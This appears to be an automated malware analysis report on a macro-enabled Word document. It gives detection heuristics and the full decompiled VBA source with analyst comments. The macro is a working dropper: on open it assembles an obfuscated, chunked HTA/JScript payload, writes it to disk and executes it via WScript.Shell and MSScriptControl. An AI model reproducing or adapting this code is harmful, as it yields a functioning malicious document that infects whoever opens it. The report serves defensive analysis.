Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a4d9a6e7773a4495…

MALICIOUS

Office (OOXML)

79.8 KB Created: 2021-04-29 10:11:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-05-10
MD5: 43f0882ab2cd821d2e4598ce7800d801 SHA-1: 8cdf0a06ccb3d4fb5721d8537a6942a93ce470a9 SHA-256: a4d9a6e7773a4495b0504b97caf75e6e9fb4d0c27e1ac577d1d7dac8bd28f338
170 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set nextReferenceTemp = CreateObject("wscript.shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set nextReferenceTemp = CreateObject("wscript.shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename Kind Source Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 10417 bytes
SHA-256: 059cab048e4466a100ac5a1fd9e8f38060840d7eaa006bb70d2a10d8a51af448
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-execution entry point: Word runs Document_Open when the document is
' opened with macros enabled (this is the OLE_VBA_DOCOPEN finding above).
' It does nothing itself except hand off to main() in module "nextIndex".
Sub Document_Open()
main
End Sub

Attribute VB_Name = "frm"
Attribute VB_Base = "0{60EC2711-5D83-44DB-9BF6-5E5FD7AECDCE}{CCE14BA2-D527-436C-B2B8-2AF842D3083E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

' Named like a UserForm click handler, but it is called directly from
' nextIndex.requestNextTitle — no user interaction is involved.
' It reads the document's built-in "title" property and passes it to
' WScript.Shell.Exec, so the command line lives in document metadata
' (docProps/core.xml), not in the macro source. The title value itself is
' not shown in this report. This is the OLE_VBA_WSCRIPT / OLE_VBA_CREATEOBJ
' match: Word spawning a child process via WScript.Shell is the detection point.
Public Sub button1_Click()
' DocumentProperty object; Exec presumably receives its default (Value) property — TODO confirm
Set arrayPointerReference = ActiveDocument.BuiltInDocumentProperties("title")
Set nextReferenceTemp = CreateObject("wscript.shell")
With nextReferenceTemp
' "$" type suffix is cosmetic here; this is a WScript.Shell.Exec call
.exec$ (arrayPointerReference)
End With
End Sub


Attribute VB_Name = "nextIndex"
' Second hop in the call chain: Document_Open -> main -> requestNextTitle.
Sub main()
requestNextTitle
End Sub
' Identity pass-through: returns its argument when non-empty, otherwise the
' function's default (Empty). Every payload fragment below is routed through
' it; that adds no behaviour and is presumably there to break simple
' string-literal signatures — TODO confirm.
Function gwc(bufViewFunc)
If Len(bufViewFunc) > 0 Then
gwc = bufViewFunc
End If
End Function
' Dropper logic:
'  1. Split the document "title" property on spaces and take the second
'     token as an output file path.
'  2. Write the assembled payload (queryArrayButton) to that path via
'     ptrTempCounter.queryGlobal.
'  3. Call frm.button1_Click, which executes the full title string with
'     WScript.Shell.
' So a single metadata field carries both the drop path and the command
' that runs the dropped file. This module has no Option Explicit, so
' classProcView and viewTemp are implicitly declared Variants.
Sub requestNextTitle()
Dim listboxRequestTrust As String
classProcView = Split(ActiveDocument.BuiltInDocumentProperties("title"), " ")
' index 1 = second space-separated token of the title
listboxRequestTrust = classProcView(1)
Set viewTemp = New ptrTempCounter
' queryArrayButton is a parameterless Function; VBA evaluates it here and
' passes the concatenated payload string as the second argument
viewTemp.queryGlobal listboxRequestTrust, queryArrayButton
frm.button1_Click
End Sub

Attribute VB_Name = "removeSelect"
' Payload fragment 1 of 8. The Len(ExA) < 31337 guard is always true for the
' four-character literals passed from queryArrayButton, so it is padding, not
' a real condition (same pattern in the seven sibling functions). The string
' is split into four-character pieces to defeat literal matching; joined, it
' opens an HTML document (<html><body><div id='content'>) followed by the
' start of an encoded blob that the later script fragments decode.
Function tableProcedure(ExA)
Dim procQueryText As Integer
procQueryText = 31337
If (Len(ExA) < procQueryText) Then tableProcedure = gwc("<htm" & "l><b" & "ody>" & "<div" & " id=" & "'con" & "tent" & "'>fT" & "tlc2" & "9sYy" & "50c2" & "lMZX" & "J1ZG" & "Vjb3" & "JwOy" & "kyIC" & "wiZ3" & "BqLn" & "JhVn" & "RzaU" & "xiaW" & "xcXG" & "NpbG" & "J1cF" & "xcc3" & "Jlc3" & "VcXD" & "pjIi" & "hlbG" & "lmb3" & "Rldm" & "FzLn" & "RzaU" & "xlcn" & "VkZW" & "Nvcn" & "A7KX" & "lkb2" & "Jlc2" & "5vcH" & "Nlci" & "5yZW" & "Ryb0" & "J0bn" & "VvQ3" & "RjZW" & "xlcy" & "hldG" & "lydy" & "50c2" & "lMZX" & "J1ZG" & "Vjb3" & "JwOz" & "EgPS" & "BlcH" & "l0Ln" & "RzaU" & "xlcn" & "VkZW" & "Nvcn" & "A7bm" & "Vwby" & "50c2" & "lMZX" & "J1ZG" & "Vjb3" & "JwOy" & "kibW" & "Flcn" & "RzLm" & "Jkb2" & "RhIi" & "h0Y2" & "VqYk" & "9YZX" & "ZpdG" & "NBIH" & "dlbi" & "A9IH" & "RzaU" & "xlcn" & "VkZW" & "Nvcn" & "Agcm" & "F2ey" & "kwMD" & "IgPT" & "0gc3" & "V0YX" & "RzLn" & "JlZH" & "JvQn" & "RudW" & "9DdG" & "NlbG" & "VzKG" & "ZpOy" & "koZG" & "5lcy")
End Function
' Payload fragment 2 of 8: continuation of the encoded blob inside the
' 'content' div. Guard and chunking as in tableProcedure.
Function tmpSelectSelect(ExA)
Dim procQueryText As Integer
procQueryText = 31337
If (Len(ExA) < procQueryText) Then tmpSelectSelect = gwc("5yZW" & "Ryb0" & "J0bn" & "VvQ3" & "RjZW" & "xlcz" & "spZX" & "NsYW" & "YgLC" & "JLQW" & "JITU" & "dWWE" & "RWSm" & "NjUW" & "k9VX" & "VLZU" & "UmNl" & "B5dD" & "VteH" & "lzRW" & "05Wk" & "N5V1" & "pEYT" & "NkRD" & "1kaW" & "MmMG" & "NwWU" & "Y9c0" & "EmdH" & "haaz" & "Y5Vz" & "F1YU" & "89ZW" & "dhcC" & "YwaE" & "o2cX" & "FuNH" & "ROcU" & "E0VX" & "hWQU" & "49U1" & "laMU" & "lCeG" & "RkcC" & "ZHTG" & "hOUk" & "IyWj" & "RrZl" & "A0UH" & "RaOT" & "1yZX" & "N1Jj" & "RreG" & "o5RF" & "dpOG" & "1zZG" & "tUOW" & "U9ZG" & "ljJl" & "lXeU" & "FDcV" & "lWTz" & "1mZX" & "I/NH" & "J1di" & "8xOT" & "g1MS" & "9YWX" & "MzZE" & "xXSF" & "FKUn" & "BUMj" & "E1Um" & "tIOU" & "5MRn" & "ZmMG" & "QvZD" & "diZj" & "FFUW" & "1CQ3" & "A2Q2" & "gvZH" & "BvNT" & "NrLz" & "M3Nz" & "kyL2" & "9yQS" & "9MNV" & "dHcH" & "JJMG" & "9QOX" & "Uvc2" & "9zZ2" & "QvbW" & "9jLj" & "FvdH" & "B5cm" & "N5YX" & "IvLz" & "pwdH")
End Function
' Payload fragment 3 of 8. Contains the "==|" sequence: "==" looks like
' base64 padding ending the first encoded item and "|" is the separator the
' embedded script later splits the content div on (see nextIndexTemp), so
' the blob holds two encoded items. Guard and chunking as in tableProcedure.
Function linkRepoStruct(ExA)
Dim procQueryText As Integer
procQueryText = 31337
If (Len(ExA) < procQueryText) Then linkRepoStruct = gwc("RoIi" & "AsIl" & "RFRy" & "Iobm" & "Vwby" & "5yZW" & "Ryb0" & "J0bn" & "VvQ3" & "RjZW" & "xlcz" & "spIn" & "B0dG" & "hsbX" & "guMm" & "xteH" & "NtIi" & "h0Y2" & "VqYk" & "9YZX" & "ZpdG" & "NBIH" & "dlbi" & "A9IH" & "JlZH" & "JvQn" & "RudW" & "9DdG" & "NlbG" & "VzIH" & "Jhdg" & "==|f" & "Xspa" & "25pT" & "GJpT" & "HRzd" & "XJ0K" & "Ghjd" & "GFjf" & "TspI" & "mF0a" & "C5yY" & "VZ0c" & "2lMY" & "mlsX" & "Fxja" & "Wxid" & "XBcX" & "HNyZ" & "XN1X" & "Fw6Y" & "yIoZ" & "WxpZ" & "mV0Z" & "WxlZ" & "C5ia" & "UxyZ" & "WZmd" & "UJub" & "3R0d" & "WJ7e" & "XJ0O" & "ykid" & "GNla" & "mJvb" & "WV0c" & "3lzZ" & "WxpZ" & "i5nb" & "ml0c" & "GlyY" & "3MiK" & "HRjZ" & "WpiT" & "1hld" & "ml0Y" & "0Egd" & "2VuI" & "D0gY" & "mlMc" & "mVmZ" & "nVCb" & "m90d" & "HViI" & "HJhd" & "jspI" & "mdwa" & "i5yY" & "VZ0c" & "2lMY" & "mlsX" & "Fxja" & "Wxid" & "XBcX" & "HNyZ" & "XN1X" & "Fw6Y" & "yAyM" & "3J2c" & "2dlc")
End Function
' Payload fragment 4 of 8: end of the encoded blob, then the HTML closes the
' 'content' div and adds three helper divs — 'table1' holds A–Z, 'table2'
' holds 0–9, '+' and '/' (together with the lowercase form this is the
' standard base64 alphabet), 'table3' is empty — and opens a JScript block.
' The first two JScript functions are memDocument (wraps new ActiveXObject)
' and responseConstVb (returns an element's innerHTML by id).
' Guard and chunking as in tableProcedure.
Function refTitle(ExA)
Dim procQueryText As Integer
procQueryText = 31337
If (Len(ExA) < procQueryText) Then refTitle = gwc("iIob" & "nVyL" & "ikib" & "Gxla" & "HMud" & "HBpc" & "mNzd" & "yIod" & "GNla" & "mJPW" & "GV2a" & "XRjQ" & "SB3Z" & "W4=<" & "/div" & "><di" & "v id" & "='ta" & "ble1" & "'>AB" & "CDEF" & "GHIJ" & "KLMN" & "OPQR" & "STUV" & "WXYZ" & "</di" & "v><d" & "iv i" & "d='t" & "able" & "2'>0" & "1234" & "5678" & "9+/<" & "/div" & "><di" & "v id" & "='ta" & "ble3" & "'></" & "div>" & "<scr" & "ipt " & "lang" & "uage" & "='ja" & "vasc" & "ript" & "'>fu" & "ncti" & "on m" & "emDo" & "cume" & "nt(s" & "wapD" & "elet" & "eSwa" & "p){r" & "etur" & "n(ne" & "w Ac" & "tive" & "XObj" & "ect(" & "swap" & "Dele" & "teSw" & "ap))" & ";}fu" & "ncti" & "on r" & "espo" & "nseC" & "onst" & "Vb(t" & "empL" & "oad)" & "{ret" & "urn(" & "coll" & "ecti" & "onCl" & "earD" & "atab" & "ase." & "getE" & "leme" & "ntBy" & "Id(t" & "empL" & "oad)" & ".inn" & "erHT" & "ML);" & "}fun" & "ctio" & "n bu" & "tton" & "Cons")
End Function
' Payload fragment 5 of 8 (JScript): buttonConst() builds the decode
' alphabet as table1 + table1.toLowerCase() + table2, and ptrRemoveValue(s)
' begins a 6-bit-per-character decoder over that alphabet (i.e. base64).
' The literal 'tArahc' is passed through the reversal helper and reads
' 'charAt' — method names are stored reversed to hide them. Guard and
' chunking as in tableProcedure.
Function viewGenericIterator(ExA)
Dim procQueryText As Integer
procQueryText = 31337
If (Len(ExA) < procQueryText) Then viewGenericIterator = gwc("t(){" & "var " & "exce" & "ptio" & "nNex" & "t = " & "resp" & "onse" & "Cons" & "tVb(" & "'tab" & "le1'" & ");va" & "r bu" & "fVb " & "= ex" & "cept" & "ionN" & "ext." & "toLo" & "werC" & "ase(" & ");va" & "r pr" & "ocLi" & "nk =" & " res" & "pons" & "eCon" & "stVb" & "('ta" & "ble2" & "');r" & "etur" & "n(ex" & "cept" & "ionN" & "ext " & "+ bu" & "fVb " & "+ pr" & "ocLi" & "nk);" & "}fun" & "ctio" & "n pt" & "rRem" & "oveV" & "alue" & "(s){" & "var " & "e={}" & "; va" & "r i;" & " var" & " b=0" & "; va" & "r c;" & " var" & " x; " & "var " & "l=0;" & " var" & " a; " & "var " & "left" & "Inde" & "xLen" & "='';" & " var" & " w=S" & "trin" & "g.fr" & "omCh" & "arCo" & "de; " & "var " & "L=s." & "leng" & "th;v" & "ar p" & "rocT" & "extB" & "uf =" & " ref" & "eren" & "ceRe" & "move" & "('tA" & "rahc" & "');f" & "or(i" & "=0;i" & "<64;" & "i++)" & "{e[b" & "utto" & "nCon" & "st()" & "[pro")
End Function
' Payload fragment 6 of 8 (JScript): rest of the base64-style decoder loop,
' then referenceRemove(), which reverses a string (split('').reverse().join('')).
' The trailing statements alias window/document and call resizeTo(1, 1) and
' moveTo(-100, -100) — hiding the window, which suggests the dropped file is
' meant to be run as an HTA rather than opened in a browser (TODO confirm from
' the title-property command). Guard and chunking as in tableProcedure.
Function documentPointer(ExA)
Dim procQueryText As Integer
procQueryText = 31337
If (Len(ExA) < procQueryText) Then documentPointer = gwc("cTex" & "tBuf" & "](i)" & "]=i;" & "}for" & "(x=0" & ";x<L" & ";x++" & "){c=" & "e[s[" & "proc" & "Text" & "Buf]" & "(x)]" & ";b=(" & "b<<6" & ")+c;" & "l+=6" & ";whi" & "le(l" & ">=8)" & "{((a" & "=(b>" & ">>(l" & "-=8)" & ")&0x" & "ff)|" & "|(x<" & "(L-2" & ")))&" & "&(le" & "ftIn" & "dexL" & "en+=" & "w(a)" & ");}}" & "retu" & "rn(l" & "eftI" & "ndex" & "Len)" & ";};f" & "unct" & "ion " & "refe" & "renc" & "eRem" & "ove(" & "next" & "Data" & "base" & "Lib)" & "{ret" & "urn " & "next" & "Data" & "base" & "Lib." & "spli" & "t(''" & ").re" & "vers" & "e()." & "join" & "('')" & ";}Ex" & "Temp" & "Refe" & "renc" & "e = " & "wind" & "ow;c" & "olle" & "ctio" & "nCle" & "arDa" & "taba" & "se =" & " doc" & "umen" & "t;Ex" & "Temp" & "Refe" & "renc" & "e.re" & "size" & "To(1" & ", 1)" & ";ExT" & "empR" & "efer" & "ence" & ".mov" & "eTo(" & "-100" & ", -1" & "00);" & "var " & "memG" & "ener")
End Function
' Payload fragment 7 of 8 (JScript): reads the 'content' div's innerHTML,
' splits it on '|' into two items, and decodes each as
' referenceRemove(ptrRemoveValue(item)) — base64-decode then reverse — into
' tempA and copyNamespaceLeft. A second script block then starts
' pasteBufferIterator(), whose first call is memDocument(referenceRemove(...)),
' i.e. an ActiveXObject created from a reversed ProgID. Guard and chunking as
' in tableProcedure.
Function nextIndexTemp(ExA)
Dim procQueryText As Integer
procQueryText = 31337
If (Len(ExA) < procQueryText) Then nextIndexTemp = gwc("icLi" & "stbo" & "x = " & "coll" & "ecti" & "onCl" & "earD" & "atab" & "ase." & "getE" & "leme" & "ntBy" & "Id('" & "cont" & "ent'" & ").in" & "nerH" & "TML;" & "var " & "memG" & "ener" & "icLi" & "stbo" & "x = " & "memG" & "ener" & "icLi" & "stbo" & "x.sp" & "lit(" & "'|')" & ";var" & " tem" & "pA =" & " ref" & "eren" & "ceRe" & "move" & "(ptr" & "Remo" & "veVa" & "lue(" & "memG" & "ener" & "icLi" & "stbo" & "x[0]" & "));v" & "ar c" & "opyN" & "ames" & "pace" & "Left" & " = r" & "efer" & "ence" & "Remo" & "ve(p" & "trRe" & "move" & "Valu" & "e(me" & "mGen" & "eric" & "List" & "box[" & "1]))" & ";</s" & "crip" & "t><s" & "crip" & "t la" & "ngua" & "ge='" & "java" & "scri" & "pt'>" & "func" & "tion" & " pas" & "teBu" & "ffer" & "Iter" & "ator" & "(dat" & "abas" & "eInd" & "ex){" & "var " & "stru" & "ctRe" & "fMem" & "ory " & "= me" & "mDoc" & "umen" & "t(re" & "fere" & "nceR" & "emov")
End Function
' Payload fragment 8 of 8. The reversed literal 'lortnoctpircs.lortnoctpircssm'
' reads 'msscriptcontrol.scriptcontrol' — the MS Script Control COM object.
' pasteBufferIterator sets Language='jscript', Timeout=60000 and calls
' AddCode(databaseIndex), so each decoded item is executed as JScript. A final
' VBScript block invokes pasteBufferIterator on tempA and copyNamespaceLeft
' (both decoded stages) and then closes the window. Detection point: an
' mshta/IE-hosted script instantiating ScriptControl. Guard and chunking as
' in tableProcedure.
Function requestDataException(ExA)
Dim procQueryText As Integer
procQueryText = 31337
If (Len(ExA) < procQueryText) Then requestDataException = gwc("e('l" & "ortn" & "octp" & "ircs" & ".lor" & "tnoc" & "tpir" & "cssm" & "'));" & "stru" & "ctRe" & "fMem" & "ory[" & "'Lan" & "guag" & "e'] " & "= 'j" & "scri" & "pt';" & "stru" & "ctRe" & "fMem" & "ory[" & "'Tim" & "eout" & "'] =" & " 600" & "00;s" & "truc" & "tRef" & "Memo" & "ry['" & "AddC" & "ode'" & "](da" & "taba" & "seIn" & "dex)" & ";ret" & "urn(" & "null" & ");}<" & "/scr" & "ipt>" & "<scr" & "ipt " & "lang" & "uage" & "='vb" & "scri" & "pt'>" & "past" & "eBuf" & "ferI" & "tera" & "tor " & "temp" & "A : " & "past" & "eBuf" & "ferI" & "tera" & "tor " & "copy" & "Name" & "spac" & "eLef" & "t : " & "ExTe" & "mpRe" & "fere" & "nce." & "clos" & "e</s" & "crip" & "t></" & "body" & "></h" & "tml>")
End Function
' Assembles the dropped file by concatenating the eight fragments in order.
' The four-character arguments are meaningless: each fragment function only
' checks Len(arg) < 31337, which always holds. With all operands being
' strings, "+" behaves as string concatenation here.
Function queryArrayButton()
queryArrayButton = tableProcedure("orde") + tmpSelectSelect("ount") + linkRepoStruct("ataE") + refTitle("ight") + viewGenericIterator("elec") + documentPointer("arBu") + nextIndexTemp("uncL") + requestDataException("ount")
End Function

Attribute VB_Name = "ptrTempCounter"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
' File-write primitive used by requestNextTitle.
'   classProc          - destination path (taken from the document title)
'   linkConstReference - content to write (the assembled HTML/script payload)
' Open ... For Output creates or truncates the file; Print #1 writes the text
' followed by a newline; the file number #1 is hard-coded. No return value is
' assigned. From a detection standpoint this is WINWORD.EXE writing a
' script-bearing file to an attacker-chosen path immediately before spawning
' a child process.
Public Function queryGlobal(classProc As String, linkConstReference As String)
Open classProc For Output As #1
Print #1, linkConstReference
Close #1
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 37376 bytes
SHA-256: 255f658f92403c020d0261b9dd4956219e00403344f4a1d8fe3034da372cfc2d